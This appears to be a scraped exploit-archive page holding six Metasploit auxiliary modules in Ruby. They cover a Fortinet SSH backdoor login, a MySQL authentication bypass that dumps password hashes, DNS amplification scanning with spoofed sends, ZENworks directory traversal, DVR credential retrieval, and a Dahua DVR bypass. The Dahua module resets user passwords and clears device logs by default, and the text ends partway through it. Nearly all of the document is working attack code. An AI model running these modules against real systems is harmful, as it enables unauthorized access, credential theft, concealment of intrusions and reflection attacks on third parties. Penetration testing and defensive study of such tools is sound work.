This Metasploit module scans for the Fortinet SSH backdoor.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::Report  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Fortinet SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Fortinet SSH backdoor.      },      'Author'         => [        'operator8203 <operator8203[at]runbox.com>', # PoC        'wvu'                                        # Module      ],      'References'     => [        ['CVE', '2016-1909'],        ['EDB', '39224'],        ['PACKETSTORM', '135225'],        ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']      ],      'DisclosureDate' => '2016-01-09',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    factory = ssh_socket_factory    ssh_opts = ssh_client_defaults.merge({      port:            rport,      # The auth method is converted into a class name for instantiation,      # so fortinet-backdoor here becomes FortinetBackdoor from the mixin      auth_methods:    ['fortinet-backdoor']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'Fortimanager_Access'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  endend

Fortinet SSH Backdoor Scanner

This Metasploit module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking. Impacts MySQL versions: - 5.1.x before 5.1.63 - 5.5.x before 5.5.24 - 5.6.x before 5.6.6 And MariaDB versions: - 5.1.x before 5.1.62 - 5.2.x before 5.2.12 - 5.3.x before 5.3.6 - 5.5.x before 5.5.23.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/mysql/client'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::MYSQL  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'MySQL Authentication Bypass Password Dump',      'Description'    => %Q{        This module exploits a password bypass vulnerability in MySQL in order        to extract the usernames and encrypted password hashes from a MySQL server.        These hashes are stored as loot for later cracking.        Impacts MySQL versions:        - 5.1.x before 5.1.63        - 5.5.x before 5.5.24        - 5.6.x before 5.6.6        And MariaDB versions:        - 5.1.x before 5.1.62        - 5.2.x before 5.2.12        - 5.3.x before 5.3.6        - 5.5.x before 5.5.23      },      'Author'        => [          'theLightCosine', # Original hashdump module          'jcran' # Authentication bypass bruteforce implementation        ],      'References'     => [          ['CVE', '2012-2122'],          ['OSVDB', '82804'],          ['URL', 'https://www.rapid7.com/blog/post/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/']        ],      'DisclosureDate' => 'Jun 09 2012',      'License'        => MSF_LICENSE    )    deregister_options('PASSWORD')    register_options( [      OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ])    ])  end  def run_host(ip)    # Keep track of results (successful connections)    results = []    # Username and password placeholders    username = datastore['USERNAME']    password = Rex::Text.rand_text_alpha(rand(8)+1)    # Do an initial check to see if we can log into the server at all    begin      socket = connect(false)      close_required = true      mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket)      results << mysql_client      close_required = false      print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}"    rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"      return    rescue ::Rex::Proto::MySQL::Client::AccessDeniedError      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"    rescue ::Interrupt      raise $!    rescue ::Exception => e      print_error "#{rhost}:#{rport} Error: #{e}"      return    ensure      socket.close if socket && close_required    end    # Short circuit if we already won    if results.length > 0      self.mysql_conn = results.first      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)    end    #    # Threaded login checker    #    max_threads = 16    cur_threads = []    # Try up to 1000 times just to be sure    queue   = [*(1 .. 1000)]    while(queue.length > 0)      while(cur_threads.length < max_threads)        # We can stop if we get a valid login        break if results.length > 0        # keep track of how many attempts we've made        item = queue.shift        # We can stop if we reach 1000 tries        break if not item        # Status indicator        print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0        t = Thread.new(item) do |count|          begin            # Create our socket and make the connection            close_required = true            s = connect(false)            mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"            results << mysql_client            close_required = false          rescue ::Rex::Proto::MySQL::Client::AccessDeniedError          rescue ::Exception => e            print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"          ensure            s.close if socket && close_required          end        end        cur_threads << t      end      # We can stop if we get a valid login      break if results.length > 0      # Add to a list of dead threads if we're finished      cur_threads.each_index do |ti|        t = cur_threads[ti]        if not t.alive?          cur_threads[ti] = nil        end      end      # Remove any dead threads from the set      cur_threads.delete(nil)      ::IO.select(nil, nil, nil, 0.25)    end    # Clean up any remaining threads    cur_threads.each {|x| x.kill }    if results.length > 0      print_good("#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes...")      self.mysql_conn = results.first      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)    end    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")  end  def dump_hashes(host, port)    # Grabs the username and password hashes and stores them as loot    res = mysql_query("SELECT user,password from mysql.user")    if res.nil?      print_error("#{host}:#{port} There was an error reading the MySQL User Table")      return    end    # Create a table to store data    tbl = Rex::Text::Table.new(      'Header'  => 'MysQL Server Hashes',      'Indent'   => 1,      'Columns' => ['Username', 'Hash']    )    if res.size > 0      res.each do |row|        next unless (row[0].to_s + row[1].to_s).length > 0        tbl << [row[0], row[1]]        print_good("#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}")      end    end    this_service = nil    if framework.db and framework.db.active      this_service = report_service(        :host  => host,        :port => port,        :name => 'mysql',        :proto => 'tcp'      )    end    report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty?  end  # Stores the Hash Table as Loot for Later Cracking  def report_hashes(hash_loot,service, host, port)    filename= "#{host}-#{port}_mysqlhashes.txt"    path = store_loot("mysql.hashes", "text/plain", host, hash_loot, filename, "MySQL Hashes", service)    print_good("#{host}:#{port} Hash Table has been saved: #{path}")  endend

MySQL Authentication Bypass Password Dump

This Metasploit module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Capture  include Msf::Auxiliary::UDPScanner  include Msf::Auxiliary::DRDoS  def initialize    super(      'Name'        => 'DNS Amplification Scanner',      'Description' => %q{          This module can be used to discover DNS servers which expose recursive          name lookups which can be used in an amplification attack against a          third party.      },      'Author'      => [ 'xistence <xistence[at]0x90.nl>'], # Original scanner module      'License'     => MSF_LICENSE,      'References'  =>          [              ['CVE', '2006-0987'],              ['CVE', '2006-0988'],          ]    )    register_options( [      Opt::RPORT(53),      OptString.new('DOMAINNAME', [true, 'Domain to use for the DNS request', 'isc.org' ]),      OptString.new('QUERYTYPE', [true, 'Query type(A, NS, SOA, MX, TXT, AAAA, RRSIG, DNSKEY, ANY)', 'ANY' ]),    ])  end  def rport    datastore['RPORT']  end  def setup    super    # Check for DNS query types byte    case datastore['QUERYTYPE']    when 'A'      querypacket="\x01"    when 'NS'      querypacket="\x02"    when 'SOA'      querypacket="\x06"    when 'MX'      querypacket="\x0f"    when 'TXT'      querypacket="\x10"    when 'AAAA'      querypacket="\x1c"    when 'RRSIG'      querypacket="\x2e"    when 'DNSKEY'      querypacket="\x30"    when 'ANY'      querypacket="\xff"    else      print_error("Invalid query type!")      return    end    targdomainpacket = []    # Before every part of the domainname there should be the length of that part (instead of a ".")    # So isc.org divided is 3isc3org    datastore['DOMAINNAME'].split('.').each do |domainpart|      # The length of the domain part in hex      domainpartlength =  "%02x" % domainpart.length      # Convert the name part to a hex string      domainpart = domainpart.each_byte.map { |b| b.to_s(16) }.join()      # Combine the length of the name part and the name part      targdomainpacket.push(domainpartlength + domainpart)    end    # Convert the targdomainpacket to a string    targdomainpacket = targdomainpacket.join.to_s    # Create a correct hex character string to be used in the packet    targdomainpacket = targdomainpacket.scan(/../).map { |x| x.hex.chr }.join    # DNS Packet including our target domain and query type    @msearch_probe = "\x09\x8d\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" + targdomainpacket + "\x00\x00" + querypacket + "\x00\x01"  end  def scanner_prescan(batch)    print_status("Sending DNS probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")    # Standard packet is 60 bytes. Add the domain size to this    sendpacketsize = 60 + datastore['DOMAINNAME'].length    print_status("Sending #{sendpacketsize} bytes to each host using the IN #{datastore['QUERYTYPE']} #{datastore['DOMAINNAME']} request")    @results = {}  end  def scan_host(ip)    if spoofed?      datastore['ScannerRecvWindow'] = 0      scanner_spoof_send(@msearch_probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])    else      scanner_send(@msearch_probe, ip, datastore['RPORT'])    end  end  def scanner_process(data, shost, sport)    # Check the response data for \x09\x8d and the next 2 bytes, which contain our DNS flags    if data =~/\x09\x8d(..)/      flags = $1      flags = flags.unpack('B*')[0].scan(/./)      # Query Response      qr = flags[0]      # Recursion Available      ra = flags[8]      # Response Code      rcode = flags[12] + flags[13] + flags[14] + flags[15]      # If these flags are set, we get a valid response      # don't test recursion available if correct answer received      # at least the case with bind and "additional-from-cache no" or version < 9.5+      if qr == "1" and rcode == "0000"        sendlength = 60 + datastore['DOMAINNAME'].length        receivelength = 42 + data.length        amp = receivelength / sendlength.to_f        print_good("#{shost}:#{datastore['RPORT']} - Response is #{receivelength} bytes [#{amp.round(2)}x Amplification]")        report_service(:host => shost, :port => datastore['RPORT'], :proto => 'udp', :name => "dns")        report_vuln(          :host => shost,          :port => datastore['RPORT'],          :proto => 'udp', :name => "DNS",          :info => "DNS amplification -  #{data.length} bytes [#{amp.round(2)}x Amplification]",          :refs => self.references)      end      # If these flags are set, we get a valid response but recursion is not available      if qr == "1" and ra == "0" and rcode == "0101"        print_status("#{shost}:#{datastore['RPORT']} - Recursion not allowed")        report_service(:host => shost, :port => datastore['RPORT'], :proto => 'udp', :name => "dns")      end    end  endend

DNS Amplification Scanner

This Metasploit module exploits a directory traversal in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This Metasploit module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'Novell ZENworks Configuration Management Preboot Service Remote File Access',      'Description'    => %q{          This module exploits a directory traversal in the ZENworks Configuration Management.        The vulnerability exists in the Preboot service and can be triggered by sending a specially        crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been        successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Luigi Auriemma', # Vulnerability Discovery          'juan vazquez' # Metasploit module        ],      'References'     =>        [          [ 'CVE', '2012-2215' ],          [ 'OSVDB', '80230' ],          [ 'URL', 'https://web.archive.org/web/20121103122235/http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]        ]    ))    register_options(      [        Opt::RPORT(998),        OptString.new('FILEPATH', [true, 'The name of the file to download', '\\WINDOWS\\system32\\drivers\\etc\\hosts']),        OptInt.new('DEPTH', [true, 'Traversal depth', 6])      ])  end  def run_host(ip)    # No point to continue if no filename is specified    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?      print_error("Please supply the name of the file you want to download")      return    end    travs = "\\.." * datastore['DEPTH']    travs << "\\" unless datastore['FILEPATH'][0] == "\\"    travs << datastore['FILEPATH']    payload = Rex::Text.to_unicode(travs)    packet =  [0x21].pack("N") # Opcode    packet << [payload.length].pack("N") # Length    packet << payload # Value    connect    sock.put(packet)    sock.get_once(4, 1)    length = sock.get_once(4, 1)    unless length      print_error("Unable to get length due to a timeout")      return    end    sock.get_once(0x210-8, 1)    contents = sock.get_once(length.unpack("V").first, 1)    unless contents      print_error("Unable to extract contents due to a timeout")      return    end    disconnect    print_good "File retrieved successfully!"    fname = File.basename(datastore['FILEPATH'])    path = store_loot(      'novell.zenworks_configuration_management',      'application/octet-stream',      ip,      contents,      fname    )    print_status("File saved in: #{path}")  endend

Novell ZENworks Configuration Management Preboot Service Remote File Access

This Metasploit module takes advantage of a protocol design issue with the Ray Sharp based DVR systems. It is possible to retrieve the username and password through the TCP service running on port 9000. Other brands using this platform and exposing the same issue may include Swann, Lorex, Night Owl, Zmodo, URMET, and KGuard Security.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Ray Sharp DVR Password Retriever',      'Description' => %q{          This module takes advantage of a protocol design issue with the        Ray Sharp based DVR systems. It is possible to retrieve the username and        password through the TCP service running on port 9000. Other brands using        this platform and exposing the same issue may include Swann, Lorex,        Night Owl, Zmodo, URMET, and KGuard Security.      },      'Author'      =>        [          'someluser', # Python script          'hdm'        # Metasploit module        ],      'References'  =>        [          [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ]        ],      'License'     => MSF_LICENSE    )    register_options( [ Opt::RPORT(9000) ])  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    req =      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" +      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" +      ( "\x00" * 475 )    connect    sock.put(req)    buf = ""    begin      # Pull data until the socket closes or we time out      Timeout.timeout(15) do        loop do          res = sock.get_once(-1, 1)          buf << res if res        end      end    rescue ::Timeout::Error    rescue ::EOFError    end    disconnect    info = ""    mac  = nil    ver  = nil    creds = {}    buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred|      # Make sure the two passwords match      next unless cred[1] == cred[2]      creds[cred[0]] = cred[1]    end    if creds.keys.length > 0      creds.keys.sort.each do |user|        pass = creds[user]        report_cred(          ip: rhost,          port: rport,          service_name: 'dvr',          user: user,          password: pass,          proof: pass        )        info << "(user='#{user}' pass='#{pass}') "      end    end    # Look for MAC address    if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi      mac = $1    end    # Look for version    if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m      ver = $1    end    info << "mac=#{mac} " if mac    info << "version=#{ver} " if ver    return unless (creds.keys.length > 0 or mac or ver)    report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info)    print_good("#{rhost}:#{rport} #{info}")  endend

Ray Sharp DVR Password Retriever

This Metasploit modules scans for Dahua-based DVRs and then grabs settings. Optionally resets a users password and clears the device logs.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'            => %q(Dahua DVR Auth Bypass Scanner),      'Description'     => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs),      'Author'          => [        'Tyler Bennett - Talos Consulting', # Metasploit module        'Jake Reynolds - Depth Security', # Vulnerability Discoverer        'Jon Hart <jon_hart[at]rapid7.com>', # improved metasploit module        'Nathan McBride' # regex extraordinaire      ],      'References'      => [        [ 'CVE', '2013-6117' ],        [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ]      ],      'License'         => MSF_LICENSE,      'DefaultAction'  => 'VERSION',      'Actions'        =>        [          [ 'CHANNEL', { 'Description' => 'Obtain the channel/camera information from the DVR' } ],          [ 'DDNS', { 'Description' => 'Obtain the DDNS settings from the DVR' } ],          [ 'EMAIL', { 'Description' => 'Obtain the email settings from the DVR' } ],          [ 'GROUP', { 'Description' => 'Obtain the group information the DVR' } ],          [ 'NAS', { 'Description' => 'Obtain the NAS settings from the DVR' } ],          [ 'RESET', { 'Description' => 'Reset an existing user\'s password on the DVR' } ],          [ 'SERIAL', { 'Description' => 'Obtain the serial number from the DVR' } ],          [ 'USER', { 'Description' => 'Obtain the user information from the DVR' } ],          [ 'VERSION', { 'Description' => 'Obtain the version of the DVR' } ]        ]    )    register_options([      OptString.new('USERNAME', [false, 'A username to reset', '888888']),      OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']),      OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]),      Opt::RPORT(37777)    ])  end  U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00"  # Payload to grab version of the DVR  VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab Email Settings of the DVR  EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \          "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab DDNS Settings of the DVR  DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \         "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab NAS Settings of the DVR  NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \        "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab the Channels that each camera is assigned to on the  DVR  CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \             "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \             "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab the Users Groups of the DVR  GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab the Users  and their hashes from the DVR  USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to grab the Serial Number of the DVR  SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Payload to clear the logs of the DVR  CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  def setup    @password = datastore['PASSWORD']    @password ||= Rex::Text.rand_text_alpha(6)  end  def grab_version    connect    sock.put(VERSION)    data = sock.get_once    return unless data =~ /[\x00]{8,}([[:print:]]+)/    ver = Regexp.last_match[1]    print_good("#{peer} -- version: #{ver}")  end  def grab_serial    connect    sock.put(SN)    data = sock.get_once    return unless data =~ /[\x00]{8,}([[:print:]]+)/    serial = Regexp.last_match[1]    print_good("#{peer} -- serial number: #{serial}")  end  def grab_email    connect    sock.put(EMAIL)    return unless (response = sock.get_once)    data = response.split('&&')    print_good("#{peer} -- Email Settings:")    return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i    if mailhost = Regexp.last_match[1].split(':')      print_status("#{peer} --  Server: #{mailhost[0]}") unless mailhost[0].blank?      print_status("#{peer} --  Server Port: #{mailhost[1]}") unless mailhost[1].blank?      print_status("#{peer} --  Destination Email: #{data[1]}") unless data[1].blank?      mailserver = "#{mailhost[0]}"      mailport = "#{mailhost[1]}"      muser = "#{data[5]}"      mpass = "#{data[6]}"    end    return if muser.blank? && mpass.blank?    print_good("  SMTP User: #{data[5]}")    print_good("  SMTP Password: #{data[6]}")    return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank?    report_email_cred(mailserver, mailport, muser, mpass)  end  def grab_ddns    connect    sock.put(DDNS)    return unless (response = sock.get_once)    data = response.split(/&&[0-1]&&/)    ddns_table = Rex::Text::Table.new(      'Header' => 'Dahua DDNS Settings',      'Indent' => 1,      'Columns' => ['Peer', 'DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password']    )    data.each_with_index do |val, index|      next if index == 0      val = val.split("&&")      ddns_service = val[0]      ddns_server = val[1]      ddns_port = val[2]      ddns_domain = val[3]      ddns_user = val[4]      ddns_pass = val[5]      ddns_table << [ peer, ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ]      unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank?        if datastore['VERBOSE']          ddns_table.print        end        report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)      end    end  end  def grab_nas    connect    sock.put(NAS)    return unless (data = sock.get_once)    print_good("#{peer} -- NAS Settings:")    server = ''    port = ''    if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/      server = Regexp.last_match[1].unpack('C*').join('.')      port = Regexp.last_match[2].unpack('S')    end    if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data      ftpuser.strip!      ftppass.strip!      unless ftpuser.blank? || ftppass.blank?        print_good("#{peer} --  NAS Server: #{server}")        print_good("#{peer} --  NAS Port: #{port}")        print_good("#{peer} -- FTP User: #{ftpuser}")        print_good("#{peer} -- FTP Pass: #{ftppass}")        report_creds(          host: server,          port: port,          user: ftpuser,          pass: ftppass,          type: "FTP",          active: true)      end    end  end  def grab_channels    connect    sock.put(CHANNELS)    data = sock.get_once.split('&&')    channels_table = Rex::Text::Table.new(      'Header' => 'Dahua Camera Channels',      'Indent' => 1,      'Columns' => ['ID', 'Peer', 'Channels']    )    return unless data.length > 1    data.each_with_index do |val, index|      number = index.to_s      channels = val[/([[:print:]]+)/]      channels_table << [ number, peer, channels ]    end    channels_table.print  end  def grab_users    connect    sock.put(USERS)    return unless (response = sock.get_once)    data = response.split('&&')    usercount = 0    users_table = Rex::Text::Table.new(      'Header' => 'Dahua Users Hashes and Rights',      'Indent' => 1,      'Columns' => ['Peer', 'Username', 'Password Hash', 'Groups', 'Permissions', 'Description']    )    data.each do |val|      usercount += 1      user, md5hash, groups, rights, name = val.match(/^.*:(.*):(.*):(.*):(.*):(.*):(.*)$/).captures      users_table << [ peer, user, md5hash, groups, rights, name]      # Write the dahua hash to the database      hash = "#{rhost} #{user}:$dahua$#{md5hash}"      report_hash(rhost, rport, user, hash)      # Write the vulnerability to the database      report_vuln(        host: rhost,        port: rport,        proto: 'tcp',        sname: 'dvr',        name: 'Dahua Authentication Password Hash Exposure',        info: "Obtained password hash for user #{user}: #{md5hash}",        refs: references      )    end    users_table.print  end  def grab_groups    connect    sock.put(GROUPS)    return unless (response = sock.get_once)    data = response.split('&&')    groups_table = Rex::Text::Table.new(      'Header' => 'Dahua groups',      'Indent' => 1,      'Columns' => ['ID', 'Peer', 'Group']    )    data.each do |val|      number = "#{val[/(([\d]+))/]}"      groups = "#{val[/(([a-z]+))/]}"      groups_table << [ number, peer, groups ]    end    groups_table.print  end  def reset_user    connect    userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password    u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring    sock.put(u1)    sock.put(u2)    sock.put(u3)    sock.get_once    sock.put(u1)    return unless sock.get_once    print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}")  end  def clear_logs    connect    sock.put(CLEAR_LOGS1)    sock.put(CLEAR_LOGS2)    print_good("#{peer} -- logs cleared")  end  def peer    "#{rhost}:#{rport}"  end  def run_host(_ip)    begin      connect      sock.put(U1)      data = sock.recv(8)      disconnect      return unless data == DVR_RESP      print_good("#{peer} -- Dahua-based DVR found")      report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR")      case action.name.upcase      when 'CHANNEL'        grab_channels      when 'DDNS'        grab_ddns      when 'EMAIL'        grab_email      when 'GROUP'        grab_groups      when 'NAS'        grab_nas      when 'RESET'        reset_user      when 'SERIAL'        grab_serial      when 'USER'        grab_users      when 'VERSION'        grab_version      end      clear_logs if datastore['CLEAR_LOGS']    ensure      disconnect    end  end  def report_hash(rhost, rport, user, hash)    service_data = {      address: rhost,      port: rport,      service_name: 'dahua_dvr',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      module_fullname: fullname,      origin_type: :service,      private_data: hash,      private_type: :nonreplayable_hash,      jtr_format: 'dahua_hash',      username: user    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED    }.merge(service_data)    create_credential_login(login_data)  end  def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)    service_data = {      address: ddns_server,      port: ddns_port,      service_name: 'ddns settings',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      module_fullname: fullname,      origin_type: :service,      private_data: ddns_pass,      private_type: :password,      username: ddns_user    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED    }.merge(service_data)    create_credential_login(login_data)  end 